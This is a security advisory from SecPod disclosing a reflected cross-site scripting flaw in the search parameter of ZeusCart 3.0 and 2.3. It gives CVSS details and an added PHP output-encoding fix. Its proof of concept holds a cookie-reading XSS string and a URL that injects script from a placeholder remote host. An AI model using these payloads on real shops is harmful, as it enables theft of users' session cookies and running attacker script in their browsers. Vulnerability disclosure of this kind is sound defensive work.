ZeusCart Ecommerce Shopping Cart Software suffers from a cross-site scripting vulnerability.
#######################################################################
ZeusCart Ecommerce Shopping Cart Software Cross-Site Scripting Vulnerability
SecPod Technologies (www.secpod.com)
Author Sooraj K.S
#######################################################################
SecPod ID: 1003
07/28/2010 Issue Discovered
07/30/2010 Vendor Notified
No Response from Vendor
Class: Cross-Site Scripting
Severity: Medium
Overview:
---------
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability.
Technical Description:
----------------------
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability because it fails to properly sanitize user-supplied input.
Input passed via the 'search' parameter in a 'search' action in index.php is
not properly verified before it is returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site. This may allow the attacker to steal cookie-based
authentication credentials and to launch other attacks.
The vulnerability has been tested in ZeusCart 3.0 and 2.3. Other versions may
also be affected.
Impact:
--------
Successful exploitation allows an attacker to execute arbitrary HTML and script
code in a user's browser session in the context of a vulnerable site.
Affected Software:
------------------
ZeusCart 3.0
ZeusCart 2.3
Tested on:
ZeusCart 3.0 and 2.3 (tested using Microsoft Internet Explorer browser)
Reference:
---------
http://www.zeuscart.com/
http://secpod.org/blog/?p=109
http://secpod.org/advisories/SECPOD_ZeusCart_XSS.txt
Proof of Concept:
-----------------
1) Input this code in the search box and click search:
'"%22%20style=x:expression(alert(document.cookie))><"
This script executed only in the Microsoft Internet Explorer browser when tested
on ZeusCart 3.0 and 2.3.
2) This example worked on ZeusCart version 2.3:
http://www.example.com/?do=search&search='"><SCRIPT SRC=//REMOTE_SITE_SCRIPT>
Solution:
----------
Fix not available
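
With no vendor fix available, a site operator can encode the reflected 'search' value at output time. The PHP below is an added example, not ZeusCart code and not part of the original advisory; the function names, and the assumption that the term is echoed into an input field's value attribute, are illustrative.

```php
<?php
// Added illustration; function names are hypothetical, not ZeusCart source.

// Vulnerable pattern: the term is reflected into an attribute unencoded,
// so a quote character ends value="" and the rest is parsed as markup.
function render_search_vulnerable(string $term): string
{
    return '<input type="text" name="search" value="' . $term . '">';
}

// Hardened pattern: encode at output time for the HTML context.
// ENT_QUOTES covers both ' and "; the PHP 5 default flag (ENT_COMPAT)
// leaves single quotes unencoded.
function render_search_hardened(string $term): string
{
    $safe = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="search" value="' . $safe . '">';
}

// True when the reflected value stays inside the attribute, i.e. it holds
// no raw quote or angle bracket that could close it or open a tag.
function value_is_contained(string $html): bool
{
    $prefix = '<input type="text" name="search" value="';
    $value  = substr($html, strlen($prefix), -2); // drop prefix and closing ">
    return preg_match('/[<>"\']/', $value) === 0;
}

$samples = [
    'blue shoes', // constructed benign search term
    // string 1 from the Proof of Concept section of this advisory
    '\'"%22%20style=x:expression(alert(document.cookie))><"',
];

foreach ($samples as $term) {
    foreach (['render_search_vulnerable', 'render_search_hardened'] as $render) {
        $html = $render($term);
        printf("%-26s contained=%-5s %s\n",
            $render, var_export(value_is_contained($html), true), $html);
    }
}
```

The same encoding has to be applied at every place the search term is written back into the page, not only in the form field.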
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Credits:
--------
Sooraj K.S of SecPod Technologies has been credited with the discovery of this
vulnerability.